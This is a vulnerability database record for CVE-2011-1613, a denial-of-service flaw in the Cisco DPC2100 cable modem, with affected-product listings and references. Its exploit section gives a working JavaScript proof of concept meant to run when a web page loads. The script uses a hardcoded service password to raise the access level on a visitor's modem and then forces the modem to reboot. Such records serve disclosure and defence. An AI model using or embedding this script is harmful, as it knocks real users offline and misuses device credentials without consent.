ID

VAR-E-201104-0199


CVE

cve_id:CVE-2011-1613

Trust: 2.4

sources: BID: 47606 // PACKETSTORM: 116898 // EXPLOIT-DB: 21523 // EDBNET: 43611

EDB ID

21523


TITLE

Cisco DPC2100 - Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 21523

DESCRIPTION

Cisco DPC2100 - Denial of Service. CVE-2011-1613CVE-72616 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 21523

AFFECTED PRODUCTS

vendor:ciscomodel:dpc2100scope: - version: -

Trust: 2.1

vendor:ciscomodel:wlc526 mobility express controllerscope:eqversion:0

Trust: 0.3

vendor:ciscomodel:wlc modules for integrated services routersscope:eqversion:0

Trust: 0.3

vendor:ciscomodel:wireless lan controlscope:eqversion:6.0.182.0

Trust: 0.3

vendor:ciscomodel:wireless lan controlscope:eqversion:7.0

Trust: 0.3

vendor:ciscomodel:wireless lan controlscope:eqversion:6.0.199.0

Trust: 0.3

vendor:ciscomodel:wireless lan controlscope:eqversion:6.0.196.0

Trust: 0.3

vendor:ciscomodel:wireless lan controlscope:eqversion:6.0.188.0

Trust: 0.3

vendor:ciscomodel:wireless lan controlscope:eqversion:6.0

Trust: 0.3

vendor:ciscomodel:wireless lan controllerscope:eqversion:21000

Trust: 0.3

vendor:ciscomodel:wireless lan controlscope:neversion:7.0.98.216

Trust: 0.3

vendor:ciscomodel:wireless lan controlscope:neversion:7.0.112.0

Trust: 0.3

vendor:ciscomodel:wireless lan controlscope:neversion:6.0.200.0

Trust: 0.3

sources: BID: 47606 // PACKETSTORM: 116898 // EXPLOIT-DB: 21523 // EDBNET: 43611

EXPLOIT

# Exploit Title: Cisco DPC2100 Denial of Service
# Date: 09/01/2010
# Author: Daniel Smith
# Software Link: http://www.cisco.com/
# Version: HW:2.1/SW:v2.0.2r1256-060303
# Tested on: OSX 10.6/Win7
# CVE: CVE-2011-1613

=======================================================
Information
=======================================================
Executing this script on page load will cause the users modem to restart when
they visit the page. This example uses javascript but can just as easily written
to in another language to accomplish something similar. Attack consists of
two parts.

Part 1 - Privilege Escalation:
POST: http://192.168.100.1/goform/_aslvl
PARAMS: SAAccessLevel=2&SAPassword=W2402

Part 2 - Modem Restart:
POST: http://192.168.100.1/goform/gscan
PARAMS: SADownStartingFrequency=705000000

=======================================================
Proof of Concept (Javascript)
=======================================================
(function() {
var b=document.getElementsByTagName('body')[0];
var otherlib=false;

if(typeof jQuery!='undefined') {
console.log('This page already using jQuery v'+jQuery.fn.jquery);
} else if (typeof $=='function') {
otherlib=true;
}
function getScript(url,success){
var script=document.createElement('script');
script.src=url;
var head=document.getElementsByTagName('head')[0],
done=false;
// Attach handlers for all browsers
script.onload=script.onreadystatechange = function(){
if ( !done && (!this.readyState
|| this.readyState == 'loaded'
|| this.readyState == 'complete') ) {
done=true;
success();
script.onload = script.onreadystatechange = null;
head.removeChild(script);
}
};
head.appendChild(script);
}
getScript('http://code.jquery.com/jquery-latest.min.js',function() {
if (typeof jQuery=='undefined') {
console.log('Sorry, but jQuery wasn\'t able to load');
} else {
console.log('This page is now jQuerified with v' + jQuery.fn.jquery);
$.post("http://192.168.100.1/goform/_aslvl", { SAAccessLevel: "2", SAPassword: "W2402" } );
console.log('Privilege Escalation: temporarily setting SAAccessLevel to \'2\'.');
$.post("http://192.168.100.1/goform/gscan", { SADownStartingFrequency: "705000000" } );
console.log('Reboot command sent.');
}
});
})();

Trust: 1.0

sources: EXPLOIT-DB: 21523

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 21523

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 21523

TYPE

Denial of Service

Trust: 1.6

sources: EXPLOIT-DB: 21523 // EDBNET: 43611

TAGS

tag:exploit

Trust: 0.5

tag:denial of service

Trust: 0.5

sources: PACKETSTORM: 116898

CREDITS

Daniel Smith

Trust: 0.6

sources: EXPLOIT-DB: 21523

EXTERNAL IDS

db:NVDid:CVE-2011-1613

Trust: 2.4

db:EXPLOIT-DBid:21523

Trust: 1.6

db:EDBNETid:43611

Trust: 0.6

db:PACKETSTORMid:116898

Trust: 0.5

db:BIDid:47606

Trust: 0.3

sources: BID: 47606 // PACKETSTORM: 116898 // EXPLOIT-DB: 21523 // EDBNET: 43611

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2011-1613

Trust: 2.1

url:https://www.exploit-db.com/exploits/21523/

Trust: 0.6

url:http://www.cisco.com/

Trust: 0.3

url:http://www.cisco.com/en/us/products/products_security_advisory09186a0080b7950e.shtml

Trust: 0.3

sources: BID: 47606 // PACKETSTORM: 116898 // EXPLOIT-DB: 21523 // EDBNET: 43611

SOURCES

db:BIDid:47606
db:PACKETSTORMid:116898
db:EXPLOIT-DBid:21523
db:EDBNETid:43611

LAST UPDATE DATE

2022-07-27T09:56:59.218000+00:00


SOURCES UPDATE DATE

db:BIDid:47606date:2012-09-26T14:50:00

SOURCES RELEASE DATE

db:BIDid:47606date:2011-04-27T00:00:00
db:PACKETSTORMid:116898date:2012-09-26T23:48:28
db:EXPLOIT-DBid:21523date:2012-09-26T00:00:00
db:EDBNETid:43611date:2012-09-26T00:00:00